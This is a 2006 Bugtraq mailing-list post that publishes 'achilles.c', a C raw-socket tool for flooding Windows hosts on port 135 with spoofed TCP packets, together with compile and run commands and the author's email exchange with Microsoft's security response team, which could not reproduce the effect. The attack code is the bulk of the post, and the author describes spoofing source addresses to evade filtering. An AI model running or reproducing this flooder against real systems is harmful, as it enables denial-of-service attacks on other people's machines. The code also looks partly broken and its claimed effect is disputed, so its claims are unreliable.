Bugtraq mailing list archives

Windows XP/NT/SMB2003/2000 Denial of Service attack


From: "J. Oquendo" <joquendo () hushmail com>
Date: Mon, 24 Jul 2006 15:01:04 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


According to Microsoft the following tool does nothing to Windows
based machines. According to my experience it does. According to
the experience of 5 separate administrators it does as well. You be
the judge of this. Initially this is/was a tool called bubonic.c
which was modified for some IDS testing on a Cisco ASA5520 so the
tool is a sort of re-post of sorts. Some of the flags were modified
and more ranDUMBness introduced.

The attack was done locally and remotely. Locally this is/was my
setup @ home:

Workstations:
Windows XP Professional Pentium Centrino Laptop
FreeBSD 6.1 Pentium M Laptop
Solaris 10 / Sunfire 280r

Networking:
Cisco 2624
Cisco 3640
Cisco 2970
3Com Superstack
Motorola Surfboard @ 10mb down 3mb up

compiled:

gcc -o achilles achilles.c

(LOCAL ATTACK)
./achilles 10.10.10.4 205.205.205.255 1 1

Remotely it was sent with the same settings and the results were
the same. The targets were two boxes, one on a T3 and the other set
up for me on a DS3 connection in which I sent the attack from my
home to both machines and the results were the same as well. I had
to change the address for the attack though and spoof it from one
of my websites to avoid RFC1918 filtering.

Keep in mind the random() calls which I know offhand will change.
Try it once, try it twice. I've gotten it to work for me every
given time, two testers stated they'd gotten even odder results.
Anyhow, since MS stated they found nothing they won't mind their
write up being quoted on this.


/*
 * Achilles.c version2
 * Remodified Achilles Windows Attack Tool
 * compiled on FreeBSD 6.1, SuSE 10
 * Solaris 10, NetBSD 3.0,
 * Proof of Concept tool that disconnects
 * Windows machines until the program is
 * stopped. Tested locally and remotely.
 *
 * linux:~ # uname -a
 * Linux linux 2.6.13-15.10-default #1 Fri May 12 16:27:12 UTC 2006
i386 GNU/Linux
 *
 * $ uname -a
 * SunOS unknown 5.10 Generic_118822-25 sun4u sparc SUNW,Sun-Fire-
280R
 *
 * -bash2-2.05b$ uname -a
 * FreeBSD hypnos 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1: Thu
May 11 01:34:54 CDT 2006
toor@hypnos:/usr/obj/usr/src/sys/HYPNOS  i386
 *
 * (c) 2006 J. Oquendo Genexsys.net::Infiltrated.net
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#ifndef __USE_BSD
#define __USE_BSD

#endif

#ifndef __FAVOR_BSD

#define __FAVOR_BSD

#endif

#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x) htons(x)

#else

#define FIX(x) (x)
#endif

struct ip_hdr {
    u_int ip_hl:4,
                ip_v:4;
    u_char ip_tos;
    u_short ip_len;
    u_short ip_id;
    u_short ip_off;
    u_char ip_ttl;
    u_char ip_p;
    u_short ip_sum;
    u_long saddr, daddr;
};

struct tcp_hdr {
    u_short th_sport;
    u_short th_dport;
    u_long th_seq;
    u_long th_syn;
    u_int th_x2:4,
                th_off:4;
    u_char th_flags;
    u_short th_win;
    u_short th_sum;
    u_short th_urp;
};

struct tcpopt_hdr {
    u_char type;
    u_char len;
    u_short value;
};

struct pseudo_hdr {
    u_long saddr, daddr;
    u_char mbz, ptcl;
    u_short tcpl;
};

struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short bgport, bgsize, pps;
u_long radd;
u_long sradd;
int sock;

void usage(char *progname)
{
    fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n",
progname);
    fprintf(stderr, "dst:\tDestination Address\n");
    fprintf(stderr, "src:\tSource Address\n");
    fprintf(stderr, "size:\tSize of packet\n");
    fprintf(stderr, "num:\tpackets\n\n");
    exit(1);
}

inline u_short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
     while (nleft > 1) {
         sum += *w++;
         nleft -= 2;
     }
     if (nleft == 1) {
         *(u_char *)(&answer) = *(u_char *) w;
         sum += answer;
     }
     sum = (sum >> 16) + (sum & 0xF0F0);
     sum += (sum >> 16);
     answer = ~sum;
     return(answer);
}

u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
       fprintf(stderr, "Could not resolve %s\n", hostname);
       exit(1);
    }

    return *(u_long *)hp->h_addr;
}

void flooder(void)
{
    struct timespec ts;
    int i;

    memset(&packet, 0, sizeof(packet));

    ts.tv_sec = 0;
    ts.tv_nsec = 100;

    packet.ip.ip_hl = 5;
    packet.ip.ip_v = 4;
    packet.ip.ip_p = IPPROTO_TCP;
    packet.ip.ip_tos = 0xa0;
    packet.ip.ip_id = radd;
    packet.ip.ip_len = FIX(sizeof(packet));
    packet.ip.ip_off = 0;
    packet.ip.ip_ttl = 255;
    packet.ip.ip_dst.s_addr = radd;

    packet.tcp.th_flags = 0;
    packet.tcp.th_win = 65535;
    packet.tcp.th_seq = random();
    packet.tcp.th_ack = 0;
    packet.tcp.th_off = random();
    packet.tcp.th_urp = 0;
    packet.tcp.th_dport = 135;
    cksum.pseudo.daddr = sradd;
    cksum.pseudo.mbz = random(); /* WATCH ME CLOSELY */
    cksum.pseudo.ptcl = IPPROTO_TCP;
    cksum.pseudo.tcpl = random();

    s_in.sin_family = AF_INET;
    s_in.sin_addr.s_addr = sradd;
    s_in.sin_port = 135;

    for(i=0;;++i) {
    if( !(i&31337) ) {
        packet.tcp.th_sport = 135;
        cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
        packet.tcp.th_flags = random();
        packet.tcp.th_ack = random();

    }
    else {
        packet.tcp.th_flags = rand();
        packet.tcp.th_ack = rand();
    }
       ++packet.ip.ip_id;
       /*++packet.tcp.th_sport*/;
       ++packet.tcp.th_seq;

       if (!bgport)
          s_in.sin_port = packet.tcp.th_dport = 135;

       packet.ip.ip_sum = 0;
       packet.tcp.th_sum = 0;

       cksum.tcp = packet.tcp;

       packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
       packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));

       if (sendto(sock, &packet, sizeof(packet), 0, (struct
sockaddr *)&s_in, sizeof(s_in)) < 0);

    }
}

int main(int argc, char *argv[])
{
    int on = 1;

    printf("Achilles.c Windows Attack Tool\n");


    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket");
       exit(1);
    }

    setgid(getgid()); setuid(getuid());

    if (argc < 4)
       usage(argv[0]);

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on,
sizeof(on)) < 0)

{
       perror("setsockopt");
       exit(1);

    }

    srand((time(NULL) ^ getpid()) + getppid());

    printf("\nFinding host\n"); fflush(stdout);

    radd = lookup(argv[1]);
    bgport = atoi(argv[3]);
    bgsize = atoi(argv[4]);
    sradd = lookup(argv[2]);
    printf("Achilles: Before my time is done I will look down on
your corpse and smile.\n");

    flooder();

    return 0;
}



From:  "J. Oquendo" <joquendo () hushmail com>
To:  Microsoft Security Response Center <secure () microsoft com>
Date:  Sat, 08 Jul 2006 22:16:24 -0400
This message is not encrypted, and is not digitally signed by
"joquendo () hushmail com" <joquendo () hushmail com> .
On Sat, 08 Jul 2006 17:47:05 -0400 Microsoft Security Response
Center <secure () microsoft com> wrote:
Hello,

I wanted to give you a brief update with regards to our status on
your
case. While I did see your post on Slashdot including snippets of
our
earlier correspondence mentioning that you have been able to repro
this
issue on multiple occasions, we unfortunately have not been
successful
in our attempts.

Thanks for responding back a second time around. I saw your first
email but laughed it off. I debated on whether or not to release it
because I know it works. Heck I just finished telling and SHOWING
my new coworkers the attack and offered an explanation of it to
them. Know something... Still worked for me. I also mentioned to
one coworker how you guess tested it with FreeBSD under VMWare and
the thought was there could be an issue with VMWare's take on the
networking stack...

We also could not identify from the provided TCPDump info any
distinct
connection attempts to port 135 that would result in a Denial of
Service.  Our investigation which has included code review, review
of
the TCPDump, and attempts on reproing the issue on multiple fresh
installs of various Windows Operating Systems have all resulted in
non
confirmation. We have also not been able to identify any of the
"odder
things" that you mentioned earlier.

Could be one of two things... Firstly the initial program was
written to break BGP routing so I issued the destport to 179. Then
I wanted to tinker with my IDS at the same time so I set it to
random()... Then I set one to MSRPC so you might have gotten the
random() of which the coding is still the same. Now to be even more
ironic about the whole thing, the version I showed to my coworkers
targeted guess what? Random ports and still shut my MS machine down
at will.

If you believe there are any additional details or information
that
would better help illustrate the issue I would gladly use it to
further
the push the investigation with the engineering teams.  Otherwise
I will
close the case with our current status and findings to date. One
question that I have is the target host that is exhibiting the
issue a
fresh install of the OS?

You guys say you can't find anything on it, then there should be no
issues with me releasing it along with mention of you guys finding
no reason to be weary of the tool. I'm sure you guys might want to
do some further investigation else it would look pretty ridiculous
for MS not to be able to find issues while everyone else on say
Bugtraq scratches their heads on MS' miscues. Instead of trying to
exploit in under FreeBSD under VMWare, try it on a dedicated
FreeBSD machine. Heck try it under Linux the code is portable.

My apologies for the delay since our last correspondence, but I
have
wanted to ensure that we have pursued every avenue before coming
back to
with this conclusion.

No apologies needed. I kind of shrugged it off a long time ago. You
guys say you can't replicate it yet I can whenever I run it. I'm
just curious if others would be able to as well. So far I have had
about 5 trusted sources test it conclusively. All results were the
same. My qualm is that of... Do the script kiddiots need another
idiotic DoS toy? Not really, but at the same time I stay shaking my
head in disbelief you guys can't find nothing while I can break
Windows 2000, 2003SMB, XP at will.


Best regards,

Adrian
Microsoft Security Response Center

-----Original Message-----
From: J. Oquendo [mailto:joquendo () hushmail com]
Sent: Tuesday, May 23, 2006 6:22 PM
To: Microsoft Security Response Center
Subject: RE: Security Vulnerability Report [6588as]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Adrian, here is a link for a two second packet dump from the BSD
machine sending out packets. http://xxx.xxx.xxx.xxx:905/ach.dump An
attachment would have been too big to send. Unsure what you guys
see but here were the flags I used when compiling and sending the
attack...

gcc -o achilles achilles.c

./achilles 10.1.1.2 192.168.1.2 1 1

The 10.1.1.2 is obviously whatever I want it to be and the 192 is
the victim host. Yes it can be sent to a remote machine as well.
Provided the remote host is not firewalled, the results are the
same.

If your concerns are solely a "Denial of Service" via resource
flood, you're semi mistaken... While the specified MSRPC port is
exhausted, this should not stop your Windows machines from
accepting in and outbound connections. Also a Denial of Service
(via resource exhaustion) has already been covered by testing this
on a colo'd machine where my connection was a fragment of the
attacked machine. Meaning... Attacking machine was a DSL based
machine with no more than a 2MBPS attacking a T3 colo'd machine
45MBPS and again... The results were the same. Remote host stopped
all in and outbound connections until I ceased...

There should be another concern that someone there at Microsoft
may
want to note... If I change the program to accept random settings
using SYN or URG flags, and random TCP codes, even odder things
happen. Being so many different packets are going through the
wire,
its difficult to pinpoint which is doing what. ... Anyhow that
dump
was killed after 2 seconds. A heck of a lot of packets being
pushed.

On Tue, 23 May 2006 19:23:37 -0400 Microsoft Security Response
Center <secure () microsoft com> wrote:
Thank you for the update with regards to your findings. We are
still
going through the repro stages of the case and there appears to
be
some
confusion over the concern. Do you happen to have a network trace
of the
behavior that I could work with our development teams in
reviewing
to
ensure that we are looking at the same concern and avoid any
possible
confusion on the matter?


Thanks,

Adrian
Microsoft Security Response Center
-----Original Message-----
From: J. Oquendo [mailto:joquendo () hushmail com]
Sent: Tuesday, May 23, 2006 1:13 PM
To: Microsoft Security Response Center
Subject: RE: Security Vulnerability Report [6588as]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Just to inform you, I have also tested this from my home to a
remote
location that is colocated on a T3 connection and the result was
the
same. I was able to break connectivity to the machine from a
1.5mb
DSL
connection to a T3. The attack was halted when firewall rules
were
in
place.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at
https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.5

wpwEAQECAAYFAkRzbLoACgkQVnroYexO+HLb5QP+Kh/uLH316Hpb3Gvyl1dBlqeGOo
B
X
/3BYWHHau0wINp7dvKKSkq1qLkaGDiXn14yqPIOTvw90mrtBQut5nebCFYRiaakui3
6
t
xQ7qv9RRll5vG7QUYGBhWIcLBzvcs+ck0ZhRjv9xJS2QsrdlOztDOpYjZggsAYF8Df
2
E
IbpNHoM=
=o8z1
-----END PGP SIGNATURE-----




Concerned about your privacy? Instantly send FREE secure email,
no
account required http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at
https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.5

wpwEAQECAAYFAkRztVIACgkQVnroYexO+HLGwAQApDSVKJ1E7WbZjg5M90yWIz4oFJP
M
1yQKNG0DchZ0bv//OXN3FiaHrh7S4iUO+dlSLLeHvUCIzG3+8oDHswo47miElprnhFL
i
lCNDVIKXPnBWZgMLI170AGT7htNrgtwUF4tOT24bK90Pe1XqjObqmgOMA1l3ceOmIx/
y
oEL/Ovk=
=Gs59
-----END PGP SIGNATURE-----




Concerned about your privacy? Instantly send FREE secure email, no
account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485


perl -e 'print $i=pack(c5,(40*2),sqrt(7600),(unpack(c,Q)-3+1+3+3-
7),oct(104),10,oct(101));'
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkTFGa0ACgkQVnroYexO+HLp2QP/Zj64NM76o6SJrHxC02n4B2r6DzoJ
sO5d1seHzAF3zd1w7/6VQ/pjHsc1dp8avGkWIoY38CW/U8knArXhra8W//Tn1FzeiKqZ
cGVM0tquO3t/3ZQzpoUR0ZX/2N9tfwVmIf0WAxrlyCQlIb9dAYOta/Rfl/vcG42g3vy9
+XOgXE8=
=AOun
-----END PGP SIGNATURE-----




Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485


Current thread: